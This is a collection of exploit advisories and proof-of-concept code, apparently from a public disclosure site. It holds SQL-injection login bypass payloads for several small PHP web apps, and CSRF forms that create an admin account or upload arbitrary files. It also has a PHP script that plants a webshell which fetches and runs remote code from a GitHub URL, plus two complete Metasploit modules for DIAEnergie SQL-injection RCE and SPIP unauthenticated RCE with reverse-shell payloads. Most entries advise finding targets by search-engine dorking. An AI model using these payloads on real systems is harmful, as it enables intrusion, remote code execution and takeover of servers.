<pre><code>=============================================================================================================================================<br />| # Title : Company Visitor Management 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] http://127.0.0.1/cvms/index.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CMSsite 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://github.com/VictorAlagwu/CMSsite/archive/master.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload injects php code of your choice into an SHELL.php file. <br /><br />[+] Line 31<br /> Line 40<br /> <br />[+] change the path of the script folder.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1<br /><br />[+] payload : <br /><br /><?php<br /><br />function file_upload($target_ip) {<br /> $file_name = "indoushka.php";<br /> $webshell_payload = "<?php<br /> \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';<br /> \$ch = curl_init();<br /> curl_setopt(\$ch, CURLOPT_URL, \$url);<br /> curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);<br /> \$output = curl_exec(\$ch);<br /> curl_close(\$ch);<br /> if (\$output) {<br /> include 'data://text/plain;base64,' . base64_encode(\$output);<br /> }<br /> ?>";<br /><br /> $post_fields = array(<br /> 'create_post' => '',<br /> 'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),<br /> 'post_title' => 'inouva',<br /> 'post_category_id' => '123',<br /> 'post_tags' => '99',<br /> 'post_content' => 'N0_name',<br /> 'post_status' => 'Hackers',<br /> 'qty' => '1'<br /> );<br /><br /> echo "(+) PHP Code Injection ...\n";<br /><br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");<br /> curl_setopt($ch, CURLOPT_POST, 1);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "(+) Shell uploaded successfully.\n";<br /> echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";<br />}<br /><br />if ($argc != 2) {<br /> echo "(+) Usage: php " . $argv[0] . " <target ip>\n";<br /> echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";<br /> exit(-1);<br />}<br /><br />$target_ip = $argv[1];<br />file_upload($target_ip);<br /><br /><br /><br />[+] Path : http://127.0.0.1/CMSsite-master/img/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CMS RIMI v1.3 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://github.com/myroot593/RIMICMS |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 9.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Profile User Form</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST"><br /> <!-- Text input for username --><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br /><br /> <!-- Password input for password --><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br /><br /> <!-- Password input for confirm password --><br /> <label for="confirm_password">Confirm Password:</label><br /> <input type="password" id="confirm_password" name="confirm_password" required><br /><br /> <!-- Text input for name --><br /> <label for="nama">Nama:</label><br /> <input type="text" id="nama" name="nama" required><br /><br /> <!-- Text input for email --><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br /><br /> <!-- Hidden input for user ID --><br /> <input type="hidden" name="id" value=""><br /><br /> <!-- Submit button --><br /> <button type="submit">Submit</button><br /> </form><br /></body><br /></html><br /><br /><br />------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------<br /><br /><br />[+] Go to the line 3.<br /><br />[+] Set the target site link Save changes and apply .<br /><br />[+] Your file : 127.0.0.1/cmsrimi/content <br /><br />[+] save code as poc.html .<br /><br /><p class="sukses-form"></p><br /><p class="error-form"></p><br /><form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data"><br /> <div class="form-group "><br /> <label>Judul :</label><br /> <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value=""><br /> <span><p class="error-form"></p></span><br /> </div><br /> <div class="form-group "><br /> <label>Isi Berita :</label><br /> <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea><br /> <span><p class="error-form"></p></span><br /> </div><br /> <div class="form-group"><br /> <label>Kategori Berita :</label><br /> <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p><br /> </div><br /> <div class="form-group"><br /> <label>Status:</label><br /> <select class="form-control" name="status_berita" id="status_berita"><br /> <option value="Diterbitkan">Diterbitkan</option><br /> <option value="Draft">Draft</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label>Gambar Berita</label><br /> <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22"><br /> <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita"><br /> <p class="error-form"></p><br /> </div><br /> <button type="submit" class="btn btn-primary">Submit</button><br /></form><br /> <p class="error-form"></p> <br /> <p class="error-form"></p><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Client ms Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/client-management-system-using-php-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/CCMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : CCMS Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/CCMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : biobook Social Networking Site 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/social/home.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::Tcp<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',<br /> 'Description' => %q{<br /> SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.<br /> This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Michael Heinzl', # MSF exploit<br /> 'Tenable' # Discovery & PoC<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],<br /> [ 'CVE', '2024-4548']<br /> ],<br /> 'DisclosureDate' => '2024-05-06',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> 'FETCH_COMMAND' => 'CURL',<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Type' => :win_fetch<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(928)<br /> ]<br /> )<br /> end<br /><br /> # Determine if the DIAEnergie version is vulnerable<br /> def check<br /> begin<br /> connect<br /> sock.put 'Who is it?'<br /> res = sock.get || ''<br /> rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e<br /> vprint_error(e.message)<br /> return Exploit::CheckCode::Unknown<br /> ensure<br /> disconnect<br /> end<br /><br /> if res.empty?<br /> vprint_status('Received an empty response.')<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> vprint_status('Who is it response: ' + res.to_s)<br /> version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/<br /> version = res.match(version_pattern)<br /><br /> if version[0].nil?<br /> Exploit::CheckCode::Detected<br /> end<br /><br /> vprint_status('Version retrieved: ' + version[0])<br /><br /> unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')<br /> return CheckCode::Safe<br /> end<br /><br /> return CheckCode::Appears<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> scname = Rex::Text.rand_text_alphanumeric(5..10).to_s<br /> vprint_status('Using random script name: ' + scname)<br /><br /> year = rand(2024..2026)<br /> month = sprintf('%02d', rand(1..12))<br /> day = sprintf('%02d', rand(1..29))<br /> random_date = "#{year}-#{month}-#{day}"<br /> vprint_status('Using random date: ' + random_date)<br /><br /> hour = sprintf('%02d', rand(0..23))<br /> minute = sprintf('%02d', rand(0..59))<br /> second = sprintf('%02d', rand(0..59))<br /> random_time = "#{hour}:#{minute}:#{second}"<br /> vprint_status('Using random time: ' + random_time)<br /><br /> # Inject payload<br /> begin<br /> print_status('Sending SQL injection...')<br /> connect<br /> vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")<br /> sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"<br /> res = sock.get<br /> unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /><br /> vprint_status('Injection - Expected response received: ' + res.to_s)<br /> disconnect<br /><br /> # Trigger<br /> print_status('Triggering script execution...')<br /> connect<br /> sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"<br /> res = sock.get<br /> unless res.to_s == 'Recalculate Script Start!'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /> vprint_status('Trigger - Expected response received: ' + res.to_s)<br /><br /> disconnect<br /><br /> print_good('Script successfully injected, check thy shell.')<br /> ensure<br /> # Cleanup<br /> print_status('Cleaning up database...')<br /> connect<br /> sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"<br /> res = sock.get<br /> unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)<br /> end<br /> vprint_status('Cleanup - Expected response received: ' + res.to_s)<br /><br /> disconnect<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Payload::Php<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',<br /> 'Description' => %q{<br /> This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.<br /> The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,<br /> allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a<br /> payload manipulating the templating data processed by the `echappe_retour()` function, invoking<br /> `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.<br /> },<br /> 'Author' => [<br /> 'Valentin Lobstein', # Metasploit module author<br /> 'Laluka', # Vulnerability discovery<br /> 'Julien Voisin' # Review<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],<br /> ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']<br /> ],<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory', {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP<br /> # tested with php/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Unix/Linux Command Shell', {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command Shell', {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2024-08-16',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> uri = normalize_uri(target_uri.path, 'spip.php')<br /> res = send_request_cgi({ 'uri' => uri.to_s })<br /><br /> return Exploit::CheckCode::Unknown('Target is unreachable.') unless res<br /> return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text<br /> return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/<br /><br /> version = ::Regexp.last_match(1)<br /><br /> if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/<br /> version = ::Regexp.last_match(1)<br /> end<br /><br /> return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version<br /><br /> print_status("SPIP Version detected: #{version}")<br /><br /> if Rex::Version.new(version) > Rex::Version.new('4.2.12')<br /> return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")<br /> end<br /><br /> return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")<br /> end<br /><br /> def php_exec_cmd(encoded_payload)<br /> dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))<br /> encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)<br /> shell = <<-END_OF_PHP_CODE<br /> #{php_preamble(disabled_varname: dis)}<br /> $c = base64_decode("#{encoded_clean_payload}");<br /> #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}<br /> END_OF_PHP_CODE<br /> return shell<br /> end<br /><br /> def exploit<br /> print_status('Preparing to send exploit payload to the target...')<br /> phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)<br /> b64_payload = framework.encoders.create('php/base64').encode(phped_payload)<br /> payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"<br /><br /> print_status('Sending exploit payload to the target...')<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'spip.php'),<br /> 'vars_get' => {<br /> 'action' => 'porte_plume_previsu'<br /> },<br /> 'data' => "data=#{payload}"<br /> })<br /> end<br /><br />end<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AVMS Project 1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user = 'or''='@gmail.com & pass = 'or''='<br /><br />[+] http://127.0.0.1/AVMS/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] Backend Requirements :<br /><br /> The server-side script (Users.php) should be capable of handling the incoming POST request, <br /> processing the form data (including saving the file), and returning an appropriate response.<br /><br /> This form can be improved by adding additional client-side validations, better error handling, <br /> and perhaps enhancing security measures, such as sanitizing inputs on the server side.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/survey/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>